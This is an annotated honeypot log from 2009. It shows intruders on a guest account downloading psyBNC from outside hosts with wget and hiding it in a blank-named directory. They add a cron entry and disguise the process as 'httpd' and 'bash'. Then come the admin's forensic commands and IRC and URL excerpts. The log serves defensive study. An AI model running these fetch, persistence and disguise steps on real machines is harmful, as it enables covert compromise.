bash-3.1$ w
23:23:07 up 2 days, 14:05, 2 users, load average: 1.96, 1.05, 0.42
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
guest pts/0 210.207.152.69 23:18 4:11 0.00s 0.06s sshd: guest [pr
guest pts/2 62.118.0.131 23:20 0.00s 0.01s 0.02s sshd: guest [pr
bash-3.1$ kill -9 28389
bash-3.1$ w
23:23:24 up 2 days, 14:06, 1 user, load average: 1.97, 1.09, 0.44
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
guest pts/2 62.118.0.131 23:20 0.00s 0.01s 0.02s sshd: guest [pr
bash-3.1$ kill -9 0
STOP at: Sun Feb 22 23:23:31 2009
Intruder install a psybnc after broke into the guest account
START at: Thu Feb 26 03:28:59 2009
bash-3.1$
bash-3.1$ a
bash: a: command not found
bash-3.1$ cat /etc/hosts
# Do not remove the following line, or various programs
# that require network functionality will fail.
[delete].99.129 [delete]1 [delete]1.[HoneyPot Domain]
[Honey Pot IP] pc18 pc18.[HoneyPot Domain]
127.0.0.1 localhost localhost.localdomain
::1 localhost6.localdomain6 localhost6
bash-3.1$ uname -a
Linux pc18 2.6.18-53.1.14.el5 #1 SMP Wed Mar 5 11:36:49 EST 2008 i686 i686 i386 GNU/Linux
bash-3.1$ passwd
Changing password for user guest.
Changing password for guest
(current) UNIX password:
New UNIX password:
Retype new UNIX password:
Sorry, passwords do not match.
New UNIX password:
BAD PASSWORD: is too similar to the old one
New UNIX password:
Retype new UNIX password:
passwd: all authentication tokens updated successfully.
bash-3.1$ cd /tmp
bash-3.1$ ls
bash-3.1$ wget
wget: missing URL
Usage: wget [OPTION]... [URL]...
Try `wget --help' for more options.
bash-3.1$ ls
bash-3.1$ cd /tmp
bash-3.1$ mkdir " "
bash-3.1$ cd " "
bash-3.1$ wget gabanu.webng.com/redone.tar.gz
--03:32:32-- http://gabanu.webng.com/redone.tar.gz
Resolving gabanu.webng.com... 38.100.19.122, 38.100.19.123
Connecting to gabanu.webng.com|38.100.19.122|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 471040 (460K) [application/x-gzip]
Saving to: `redone.tar.gz'
0% [ ] 0 --.-K/s
1% [ ] 6,132 24.8K/s
1% [ ] 9,028 18.6K/s
3% [> ] 15,524 21.3K/s
5% [=> ] 25,764 26.5K/s
7% [==> ] 36,004 29.6K/s
9% [==> ] 46,244 31.4K/s
11% [===> ] 56,484 32.9K/s
14% [====> ] 68,172 34.8K/s
16% [=====> ] 76,964 34.9K/s
18% [======> ] 87,204 35.6K/s
20% [=======> ] 97,444 36.2K/s
22% [=======> ] 105,636 36.0K/s
24% [========> ] 115,876 36.4K/s eta 10s
26% [=========> ] 126,116 36.9K/s eta 10s
28% [==========> ] 136,356 37.2K/s eta 10s
31% [===========> ] 146,596 37.5K/s eta 10s
33% [============> ] 158,284 38.1K/s eta 10s
35% [=============> ] 167,076 38.0K/s eta 8s
37% [==============> ] 177,316 38.2K/s eta 8s
39% [==============> ] 187,556 38.4K/s eta 8s
42% [===============> ] 199,244 39.6K/s eta 8s
44% [================> ] 208,036 40.7K/s eta 8s
45% [=================> ] 216,228 41.1K/s eta 6s
48% [==================> ] 226,468 41.1K/s eta 6s
50% [===================> ] 236,708 41.1K/s eta 6s
52% [===================> ] 246,948 41.2K/s eta 6s
54% [====================> ] 257,188 41.2K/s eta 6s
56% [=====================> ] 267,428 40.9K/s eta 5s
58% [======================> ] 277,668 41.2K/s eta 5s
61% [=======================> ] 289,356 41.5K/s eta 5s
63% [========================> ] 298,148 41.2K/s eta 5s
65% [=========================> ] 309,836 41.9K/s eta 5s
67% [==========================> ] 318,628 41.6K/s eta 4s
69% [==========================> ] 328,868 41.6K/s eta 4s
71% [===========================> ] 339,108 41.6K/s eta 4s
74% [============================> ] 349,348 41.6K/s eta 4s
76% [=============================> ] 359,588 41.3K/s eta 4s
78% [==============================> ] 367,780 41.2K/s eta 3s
80% [===============================> ] 378,020 41.2K/s eta 3s
82% [===============================> ] 388,260 41.2K/s eta 3s
84% [================================> ] 399,948 41.2K/s eta 3s
86% [=================================> ] 408,740 41.2K/s eta 3s
88% [==================================> ] 418,980 41.6K/s eta 1s
91% [===================================> ] 429,220 41.6K/s eta 1s
93% [====================================> ] 439,460 41.6K/s eta 1s
95% [=====================================> ] 449,700 41.6K/s eta 1s
97% [======================================> ] 459,940 41.6K/s eta 1s
100%[=======================================>] 471,040 41.8K/s eta 0s
100%[=======================================>] 471,040 41.8K/s in 11s
03:32:51 (40.2 KB/s) - `redone.tar.gz' saved [471040/471040]
bash-3.1$ tar xvf redone.tar.gz
redone/
redone/scripts/
redone/scripts/INFO
redone/scripts/DEFAULT.SCRIPT
redone/scripts/example/
redone/scripts/example/DEFAULT.SCRIPT
redone/lang/
redone/lang/INFO
redone/lang/english.lng
redone/motd/
redone/motd/INFO
redone/kik
redone/proc
redone/psybnc.conf
redone/httpd
redone/hide
redone/run
redone/config
redone/log/
redone/log/INFO
redone/help/
redone/help/DCCCHAT.TXT
....
....
....
redone/help/ENCRYPT.TXT
redone/help/LINKFROM.TXT
redone/help/BREHASH.TXT
redone/help/SETUSERNAME.TXT
redone/fuck
redone/config.h
bash-3.1$ cd redone
bash-3.1$ ls
config fuck hide kik log proc run
config.h help httpd lang motd psybnc.conf scripts
bash-3.1$ ./config private 31337
PSYBNC Configure By ReD_oNe
PSYBNC.SYSTEM.PORT1=31337
PSYBNC.SYSTEM.HOST1=*
PSYBNC.HOSTALLOWS.ENTRY0=*;*
USER0.USER.LOGIN=private
USER0.USER.PASS=*
USER0.USER.RIGHTS=1
bash-3.1$ ./fuck
* * * * * /tmp/ /redone/y2kupdate >/dev/null 2>&1
bash-3.1$ ./run
.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
,----.,----.,-. ,-.,---.,--. ,-.,----.
| O || ,-' \ \/ / | o || \| || ,--'
| _/ _\ \ \ / | o< | |\ || |__
|_| |____/ |__| |___||_| \_| \___|
Version 2.3.1 (c) 1999-2002
the most psychoid
and the cool lam3rz Group IRCnet
`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-'
Configuration File: redone
Language File: psyBNC Language File - English
No logfile specified, logging to log/psybnc.log
Listening on: 0.0.0.0 port 31337
psyBNC2.3.1-cBtITLdDMSNp started (PID 7847)
bash-3.1$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
radiusd:x:95:95:radiusd user:/:/bin/false
squid:x:23:23::/var/spool/squid:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/sbin/bash
ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
cto:x:30004:30004:Chief Technical Officer:/home/cto:/sbin/bash
guest:x:30005:30005:Demo guest account:/home/guest:/sbin/bash
demo:x:30006:30006:Demo for IEE:/home/demo:/sbin/bash
bash-3.1$
STOP at: Thu Feb 26 03:35:55 2009
The intruder disguised the running of psybnc as a shell program
START at: Sat Mar 21 19:44:33 2009
ls
bash: cd: /tmpls: No such file or directory
bash-3.1$ cd /tmp/" "
bash-3.1$ ls
bash-3.1$ wget http://helpbnc.ucoz.net/stuff/PsyLinux.tgz
--19:44:56-- http://helpbnc.ucoz.net/stuff/PsyLinux.tgz
Resolving helpbnc.ucoz.net... 208.100.61.2
Connecting to helpbnc.ucoz.net|208.100.61.2|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 573709 (560K) [application/octet-stream]
Saving to: `PsyLinux.tgz'
0% [ ] 0 --.-K/s
0% [ ] 0 --.-K/s
0% [ ] 4,344 3.37K/s
1% [ ] 10,136 6.61K/s
4% [> ] 26,064 14.7K/s
7% [==> ] 44,888 22.2K/s
15% [=====> ] 88,328 39.0K/s
26% [=========> ] 150,592 59.8K/s
43% [================> ] 248,896 90.0K/s
60% [=======================> ] 347,200 115K/s
77% [==============================> ] 445,504 137K/s eta 1s
94% [====================================> ] 543,808 155K/s eta 1s
100%[=======================================>] 573,709 163K/s in 3.4s
19:45:01 (163 KB/s) - `PsyLinux.tgz' saved [573709/573709]
bash-3.1$ tar zxvf PsyLinux.tgz
psybnc/
psybnc/makefile.out
psybnc/tools/
psybnc/tools/chkenv
psybnc/tools/sys
....
.....
......
psybnc/src/p_idea.c
psybnc/src/bsd-setenv.c
psybnc/src/ssl.cnf
psybnc/src/p_crypt.c
psybnc/CHANGES
psybnc/psybnc
psybnc/motd/
psybnc/motd/INFO
psybnc/FAQ
psybnc/Makefile
bash-3.1$ cd psybnc
bash-3.1$ ls
CHANGES README help makesalt psybnc.conf src
COPYING SCRIPTING lang menuconf psybncchk targets.mak
FAQ TODO log motd salt.h tools
Makefile config.h makefile.out psybnc scripts
bash-3.1$ mv psybnc bash
bash-3.1$ chmod +x *
bash-3.1$ cat psybnc.conf
PSYBNC.SYSTEM.PORT1=31337
PSYBNC.SYSTEM.HOST1=*
PSYBNC.HOSTALLOWS.ENTRY0=*;*
bash-3.1$ PATH+'.'
bash: PATH+.: command not found
bash-3.1$ PAth='.'
bash-3.1$ bash
[guest@pc18 psybnc]$ PATH='.'
[guest@pc18 psybnc]$ bash
.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
,----.,----.,-. ,-.,---.,--. ,-.,----.
| O || ,-' \ \/ / | o || \| || ,--'
| _/ _\ \ \ / | o< | |\ || |__
|_| |____/ |__| |___||_| \_| \___|
Version 2.3.2-4 (c) 1999-2003
the most psychoid
and the cool lam3rz Group IRCnet
`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-'
Configuration File: psybnc.conf
Language File: psyBNC Language File - English
No logfile specified, logging to log/psybnc.log
Listening on: 0.0.0.0 port 31337
psyBNC2.3.2-4-cBtITLdDMSNp started (PID 29855)
]0;guest@pc18:/tmp/ /psybnc[guest@pc18 psybnc]$
STOP at: Sat Mar 21 19:47:24 2009
START at: Wed Mar 25 20:50:55 2009
ls
bash: /tmls: No such file or directory
bash-3.1$ cd /tmp
bash-3.1$ ls
bash-3.1$ cd " "
bash-3.1$ ls
PsyLinux.tgz psybnc
bash-3.1$ ps -x
Warning: bad syntax, perhaps a bogus '-'? See /usr/share/doc/procps-3.2.7/FAQ
PID TTY STAT TIME COMMAND
15611 ? S 0:00 bash
15625 ? S 0:00 sshd: guest@pts/0
15627 pts/1 Ss 0:00 /bin/bash
15638 pts/1 R+ 0:00 ps -x
bash-3.1$ kill -9 15611
bash-3.1$ ls
PsyLinux.tgz psybnc
bash-3.1$ cd psybnc/
bash-3.1$ ls
CHANGES SCRIPTING lang motd salt.h
COPYING TODO log psybnc.conf scripts
FAQ bash makefile.out psybnc.conf.old src
Makefile config.h makesalt psybnc.pid targets.mak
README help menuconf psybncchk tools
bash-3.1$ mv bash sh
bash-3.1$ PATH='.'
bash-3.1$ sh
.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
,----.,----.,-. ,-.,---.,--. ,-.,----.
| O || ,-' \ \/ / | o || \| || ,--'
| _/ _\ \ \ / | o< | |\ || |__
|_| |____/ |__| |___||_| \_| \___|
Version 2.3.2-4 (c) 1999-2003
the most psychoid
and the cool lam3rz Group IRCnet
`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-'
Configuration File: psybnc.conf
Language File: psyBNC Language File - English
No logfile specified, logging to log/psybnc.log
Listening on: 0.0.0.0 port 31337
psyBNC2.3.2-4-cBtITLdDMSNp started (PID 15643)
bash-3.1$
STOP at: Wed Mar 25 20:54:15 2009
Exam the honeypot processes
Script started on Thu 16 Apr 2009 08:57:27 AM HKT
fortress:/root> ssh pc18/[K
Last login: Wed Apr 15 09:44:37 2009 from [delete]-fw.[HoneyPot Domain]
]0;root@pc18:~[root@pc18 ~]# tcsh
[root@pc18 ~]# cd
pc18:/root> cd /tmp
pc18:/tmp> ls
/ ./ ../ .font-unix/ .ICE-unix/
pc18:/tmp> cd " "
pc18:/tmp/ > ls
./ ../
pc18:/tmp/ > ls -lR
.:
total 12
drwxr-xr-x 2 guest guest 4096 Apr 16 04:34 ./
drwxrwxrwt 5 root root 4096 Apr 12 04:25 ../
pc18:/tmp/ > ls -lR
.:
total 12
drwxr-xr-x 2 guest guest 4096 Apr 16 04:34 ./
drwxrwxrwt 5 root root 4096 Apr 12 04:25 ../
pc18:/tmp/ > ps -ef
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 Mar01 ? 00:00:01 init [3]
root 2 1 0 Mar01 ? 00:00:00 [migration/0]
root 3 1 0 Mar01 ? 00:00:03 [ksoftirqd/0]
root 4 1 0 Mar01 ? 00:00:00 [watchdog/0]
root 5 1 0 Mar01 ? 00:00:01 [events/0]
root 6 1 0 Mar01 ? 00:00:00 [khelper]
root 7 1 0 Mar01 ? 00:00:00 [kthread]
root 10 7 0 Mar01 ? 00:00:07 [kblockd/0]
root 11 7 0 Mar01 ? 00:00:00 [kacpid]
root 67 7 0 Mar01 ? 00:00:00 [cqueue/0]
root 70 7 0 Mar01 ? 00:00:00 [khubd]
root 72 7 0 Mar01 ? 00:00:00 [kseriod]
root 135 7 0 Mar01 ? 00:00:02 [pdflush]
root 136 7 0 Mar01 ? 00:00:02 [pdflush]
root 137 7 0 Mar01 ? 00:01:10 [kswapd0]
root 138 7 0 Mar01 ? 00:00:00 [aio/0]
root 291 7 0 Mar01 ? 00:00:00 [kpsmoused]
root 320 7 0 Mar01 ? 00:00:00 [scsi_eh_0]
root 321 7 0 Mar01 ? 00:00:50 [kjournald]
root 349 7 0 Mar01 ? 00:00:00 [kauditd]
root 383 1 0 Mar01 ? 00:00:00 /sbin/udevd -d
root 681 7 0 Mar01 ? 00:00:00 [ata/0]
root 682 7 0 Mar01 ? 00:00:00 [ata_aux]
root 1060 7 0 Mar01 ? 00:00:00 [kmpathd/0]
root 1536 1 0 Mar01 ? 00:00:11 auditd
root 1538 1536 0 Mar01 ? 00:00:12 python /sbin/audispd
root 1557 1 0 Mar01 ? 00:00:15 syslogd -m 0
root 1560 1 0 Mar01 ? 00:00:00 klogd -x
rpc 1677 1 0 Mar01 ? 00:00:00 portmap
rpcuser 1703 1 0 Mar01 ? 00:00:00 rpc.statd
root 1749 1 0 Mar01 ? 00:00:00 rpc.idmapd
root 1839 1 0 Mar01 ? 00:01:22 /usr/sbin/vmware-guestd --background /var/run/vmware-guestd.pid
dbus 1862 1 0 Mar01 ? 00:00:00 dbus-daemon --system
root 1910 1 0 Mar01 ? 00:00:00 pcscd
root 1935 1 0 Mar01 ? 00:00:00 /usr/sbin/acpid
root 1954 1 0 Mar01 ? 00:00:05 /usr/sbin/sshd
root 1971 1 0 Mar01 ? 00:00:00 xinetd -stayalive -pidfile /var/run/xinetd.pid
ntp 1990 1 0 Mar01 ? 00:00:00 ntpd -u ntp:ntp -p /var/run/ntpd.pid -g
root 2032 1 0 Mar01 ? 00:00:00 sendmail: accepting connections
smmsp 2040 1 0 Mar01 ? 00:00:00 sendmail: Queue runner@01:00:00 for /var/spool/clientmqueue
root 2057 1 0 Mar01 ? 00:00:00 gpm -m /dev/input/mice -t exps2
root 2099 1 0 Mar01 ? 00:00:10 crond
root 2126 1 0 Mar01 ? 00:00:00 squid -D
squid 2128 2126 0 Mar01 ? 00:00:24 (squid) -D
squid 2130 2128 0 Mar01 ? 00:00:00 (unlinkd)
xfs 2166 1 0 Mar01 ? 00:00:00 xfs -droppriv -daemon
apache 2187 6576 0 Apr12 ? 00:00:00 /usr/sbin/httpd
apache 2188 6576 0 Apr12 ? 00:00:00 /usr/sbin/httpd
apache 2189 6576 0 Apr12 ? 00:00:00 /usr/sbin/httpd
apache 2190 6576 0 Apr12 ? 00:00:00 /usr/sbin/httpd
apache 2191 6576 0 Apr12 ? 00:00:00 /usr/sbin/httpd
apache 2192 6576 0 Apr12 ? 00:00:00 /usr/sbin/httpd
apache 2193 6576 0 Apr12 ? 00:00:00 /usr/sbin/httpd
apache 2194 6576 0 Apr12 ? 00:00:00 /usr/sbin/httpd
root 2197 1 0 Mar01 ? 00:00:00 /usr/sbin/atd
apache 2202 6576 0 Apr13 ? 00:00:00 /usr/sbin/httpd
68 2213 1 0 Mar01 ? 00:00:00 hald
root 2214 2213 0 Mar01 ? 00:00:00 hald-runner
68 2221 2214 0 Mar01 ? 00:00:00 hald-addon-acpi: listening on acpid socket /var/run/acpid.socket
68 2228 2214 0 Mar01 ? 00:00:00 hald-addon-keyboard: listening on /dev/input/event0
root 2237 2214 0 Mar01 ? 00:00:32 hald-addon-storage: polling /dev/hdc
root 2261 1 0 Mar01 ? 00:00:00 /usr/bin/perl -w /bin/ntpmon
root 2264 1 0 Mar01 tty1 00:00:00 /sbin/mingetty tty1
root 2265 1 0 Mar01 tty2 00:00:00 /sbin/mingetty tty2
root 2276 1 0 Mar01 tty3 00:00:00 /sbin/mingetty tty3
root 2279 1 0 Mar01 tty4 00:00:00 /sbin/mingetty tty4
root 2282 1 0 Mar01 tty5 00:00:00 /sbin/mingetty tty5
root 2283 1 0 Mar01 tty6 00:00:00 /sbin/mingetty tty6
root 6574 1 0 Mar24 ? 00:00:00 /usr/sbin/nss_pcache off /etc/httpd/alias
root 6576 1 0 Mar24 ? 00:00:02 /usr/sbin/httpd
guest 6599 1 0 Apr08 ? 00:01:38 /usr/local/apache/bin/httpd -DSSL
named 10374 1 0 Apr08 ? 00:00:23 /usr/sbin/named -u named
guest 14522 1 0 04:44 ? 00:00:00 bash
root 15451 1954 0 08:57 ? 00:00:00 sshd: root@pts/0
root 15453 15451 0 08:57 pts/0 00:00:00 -bash
root 15481 15453 0 08:57 pts/0 00:00:00 -csh
root 15521 15481 0 08:58 pts/0 00:00:00 ps -ef
apache 27549 6576 0 Apr12 ? 00:00:00 /usr/sbin/httpd
pc18:/tmp/ > ps -ef|grep guest
root 1839 1 0 Mar01 ? 00:01:22 /usr/sbin/vmware-guestd --background /var/run/vmware-guestd.pid
guest 6599 1 0 Apr08 ? 00:01:38 /usr/local/apache/bin/httpd -DSSL ? redone
guest 14522 1 0 04:44 ? 00:00:00 bash
pc18:/tmp/ > lsof -p 6599
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
httpd 6599 guest cwd DIR 8,1 0 1317314 /tmp/ /redone (deleted)
httpd 6599 guest rtd DIR 8,1 4096 2 /
httpd 6599 guest txt REG 8,1 202544 1317318 /tmp/ /redone/httpd (deleted)
httpd 6599 guest mem REG 8,1 76400 426061 /lib/libresolv-2.5.so
httpd 6599 guest mem REG 8,1 125736 425986 /lib/ld-2.5.so
httpd 6599 guest mem REG 8,1 1589908 426002 /lib/libc-2.5.so
httpd 6599 guest mem REG 8,1 208352 426025 /lib/libm-2.5.so
httpd 6599 guest mem REG 8,1 46680 426024 /lib/libnss_files-2.5.so
httpd 6599 guest mem REG 8,1 21788 426022 /lib/libnss_dns-2.5.so
httpd 6599 guest 0u CHR 136,4 6 /dev/pts/4 (deleted)
httpd 6599 guest 1u CHR 136,4 6 /dev/pts/4 (deleted)
httpd 6599 guest 2u CHR 136,4 6 /dev/pts/4 (deleted)
httpd 6599 guest 3u IPv4 2774371 TCP *:acmsoda (LISTEN)
httpd 6599 guest 4w REG 8,1 21577 1409728 /tmp/ /redone/log/psybnc.log.old (deleted)
httpd 6599 guest 5w REG 8,1 5 1317329 /tmp/ /redone/psybnc.pid (deleted)
httpd 6599 guest 6u IPv4 3238239 TCP pc18:4144->Tampa.FL.US.Undernet.org:ircd (CLOSE_WAIT)
httpd 6599 guest 7w REG 8,1 0 1409729 /tmp/ /redone/log/USER1.TRL (deleted)
httpd 6599 guest 8u IPv4 3277295 TCP pc18:4759->undernet.xs4all.nl:6669 (CLOSE_WAIT)
httpd 6599 guest 9w REG 8,1 0 1409732 /tmp/ /redone/log/USER2.TRL (deleted)
httpd 6599 guest 10u IPv4 3276160 TCP pc18:acmsoda->pc19.supernet.logicomp-data.1stclass.ro:sbl (CLOSE_WAIT)
httpd 6599 guest 11u sock 0,5 3279588 can't identify protocol
httpd 6599 guest 12u IPv4 3279548 UDP pc18:de-cache-query->[delete]1:domain
pc18:/tmp/ > lsof -p 14522
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
bash 14522 guest cwd DIR 8,1 4096 1409630 /home/guest/ /psybnc
bash 14522 guest rtd DIR 8,1 4096 2 /
bash 14522 guest txt REG 8,1 210248 1417464 /home/guest/ /psybnc/bash
bash 14522 guest mem REG 8,1 21788 426022 /lib/libnss_dns-2.5.so
bash 14522 guest mem REG 8,1 46680 426024 /lib/libnss_files-2.5.so
bash 14522 guest mem REG 8,1 76400 426061 /lib/libresolv-2.5.so
bash 14522 guest mem REG 8,1 125736 425986 /lib/ld-2.5.so
bash 14522 guest mem REG 8,1 1589908 426002 /lib/libc-2.5.so
bash 14522 guest mem REG 8,1 208352 426025 /lib/libm-2.5.so
bash 14522 guest 0u CHR 136,2 4 /dev/pts/2 (deleted)
bash 14522 guest 1u CHR 136,2 4 /dev/pts/2 (deleted)
bash 14522 guest 2u CHR 136,2 4 /dev/pts/2 (deleted)
bash 14522 guest 3u IPv4 3281690 TCP *:31337 (LISTEN)
bash 14522 guest 4w REG 8,1 574 1417469 /home/guest/ /psybnc/log/psybnc.log
bash 14522 guest 5w REG 8,1 6 1417470 /home/guest/ /psybnc/psybnc.pid
bash 14522 guest 7w REG 8,1 0 1417472 /home/guest/ /psybnc/log/USER1.TRL
bash 14522 guest 8u IPv4 3281720 TCP pc18:video-activmail->Tampa.FL.US.Undernet.org:ircd (ESTABLISHED)
pc18:/tmp/ > cd /home/quest
/home/quest: No such file or directory.
pc18:/tmp/ > cd /home/guest /" "/
pc18:/home/guest/ > ls
./ ../ psybnc/ PsyLinux.tgz
pc18:/home/guest/ > cd psybnc/
pc18:/home/guest/ /psybnc> ls -tlr
total 420
-rwxr-xr-x 1 guest guest 369 Aug 9 2000 psybncchk*
-rwxr-xr-x 1 guest guest 17982 Mar 26 2001 COPYING*
-rwxr-xr-x 1 guest guest 15738 Jul 15 2001 SCRIPTING*
-rwxr-xr-x 1 guest guest 3901 Jan 12 2002 targets.mak*
-rwxr-xr-x 1 guest guest 929 May 7 2002 config.h*
-rwxr-xr-x 1 guest guest 3560 Jul 25 2003 FAQ*
-rwxr-xr-x 1 guest guest 35624 Jul 26 2003 README*
-rwxr-xr-x 1 guest guest 2137 Sep 26 2003 Makefile*
-rwxr-xr-x 1 guest guest 1618 Sep 26 2003 TODO*
-rwxr-xr-x 1 guest guest 34872 Jun 25 2004 CHANGES*
-rwxr-xr-x 1 guest guest 947 Jan 6 2006 salt.h*
-rwxr-xr-x 1 guest guest 8090 Jan 6 2006 makesalt*
-rwxr-xr-x 1 guest guest 731 Jan 6 2006 makefile.out*
-rwxr-xr-x 1 guest guest 210248 Jan 6 2006 bash*
drwxr-xr-x 2 guest guest 4096 Jul 16 2007 src/
drwxr-xr-x 3 guest guest 4096 Jul 16 2007 scripts/
drwxr-xr-x 3 guest guest 4096 Jul 16 2007 menuconf/
drwxr-xr-x 2 guest guest 4096 Jul 16 2007 lang/
drwxr-xr-x 2 guest guest 12288 Jul 16 2007 help/
drwxr-xr-x 2 guest guest 4096 Jul 16 2007 tools/
drwxr-xr-x 3 guest guest 4096 Apr 16 04:43 ../
-rw------- 1 guest guest 6 Apr 16 04:44 psybnc.pid
drwxr-xr-x 2 guest guest 4096 Apr 16 04:44 log/
drwxr-xr-x 2 guest guest 4096 Apr 16 04:45 motd/
-rw------- 1 guest guest 1040 Apr 16 04:51 psybnc.conf.old
-rw------- 1 guest guest 1040 Apr 16 04:58 psybnc.conf
drwxr-xr-x 10 guest guest 4096 Apr 16 04:58 ./
pc18:/home/guest/ /psybnc> cd /proc/6599
pc18:/proc/6599> ls -l
total 0
dr-xr-xr-x 5 guest guest 0 Apr 16 00:06 ./
dr-xr-xr-x 92 root root 0 Mar 1 17:40 ../
dr-xr-xr-x 2 guest guest 0 Apr 16 09:02 attr/
-r-------- 1 guest guest 0 Apr 16 09:02 auxv
-r--r--r-- 1 guest guest 0 Apr 16 06:30 cmdline
-r--r--r-- 1 guest guest 0 Apr 16 09:02 cpuset
lrwxrwxrwx 1 guest guest 0 Apr 16 08:58 cwd -> /tmp/ /redone (deleted)
-r-------- 1 guest guest 0 Apr 16 09:02 environ
lrwxrwxrwx 1 guest guest 0 Apr 16 08:58 exe -> /tmp/ /redone/httpd (deleted)
dr-x------ 2 guest guest 0 Apr 16 08:58 fd/
-rw-r--r-- 1 guest guest 0 Apr 16 09:02 loginuid
-r--r--r-- 1 guest guest 0 Apr 16 08:58 maps
-rw------- 1 guest guest 0 Apr 16 09:02 mem
-r--r--r-- 1 guest guest 0 Apr 16 09:02 mounts
-r-------- 1 guest guest 0 Apr 16 09:02 mountstats
-rw-r--r-- 1 guest guest 0 Apr 16 09:02 oom_adj
-r--r--r-- 1 guest guest 0 Apr 16 09:02 oom_score
lrwxrwxrwx 1 guest guest 0 Apr 16 08:58 root -> //
-r--r--r-- 1 guest guest 0 Apr 16 09:02 schedstat
-r-------- 1 guest guest 0 Apr 16 09:02 smaps
-r--r--r-- 1 guest guest 0 Apr 16 08:58 stat
-r--r--r-- 1 guest guest 0 Apr 16 09:02 statm
-r--r--r-- 1 guest guest 0 Apr 16 06:30 status
dr-xr-xr-x 3 guest guest 0 Apr 16 09:02 task/
-r--r--r-- 1 guest guest 0 Apr 16 09:02 wchan
pc18:/proc/6599> cat exe > /tmp/httpd
pc18:/proc/6599> ls -l /tmp/httpd
-rw-r--r-- 1 root root 202544 Apr 16 09:02 /tmp/httpd
pc18:/proc/6599> rm /tmp/httpd
rm: remove regular file `/tmp/httpd'? yes
pc18:/proc/6599> exit
exit
IRC traffic sample
International: user that is the root .. is anyone on the local ..
International: if you give me someone to root flood :))..
_keech: sheep may be in luck and catch at least one root: D.
Baned #: 22 I did not just root Scanning with php ..
# N.A.S.A: you have a root with php? ..
International: root that had 180 days up `and nobody entered him :))..
oz: I had a root ..
oz: director at the bank
Top 5 URIs that have appeared in the IRC data
On port 31337
155 http://radiokyky.ghcomm.net:8080/listen.pls
10 http://eliteradio.info:8181/listen.pls
8 http://cservice.undernet.org/live/view_app.php?id=1238682998-9084&back=checkapp
8 http://bsh.ro
6 http://staudeasuprata.hi5.com
On port 6667
471 http://radiokyky.ghcomm.net:8080/listen.pls
73 http://bsh.ro
32 http://www.eastside.ro
26 http://asculta.radioliberty.ro:1989/listen.pls
22 http://cservice.undernet.org/live/view_app.php?id=1238751547-147470&ba
On port 6669
2 http://phlo0.ucoz.de/psydarwin.tgz
2 http://alexandrucordea.ws
1 http://www.youtube.com/watch?v=wxuwycmsrto&nr=1
1 http://www.youtube.com/watch?v=mghqs3wk27w
1 http://www.youtube.com/watch?v=_5pysbiaxvs&nr=1
On port 6969
26 http://cservice.undernet.org/live/view_app.php?id=1239110902-9084&back=checkapp
7 http://www.mirc.com/get.html
4 http://79.113.108.242:8000
3 http://ftp.reflectionspress.com/postcard/postcard.exe
2 http://sportpedia.mysport.ro/images/2/21/prepelita_andrei.jpg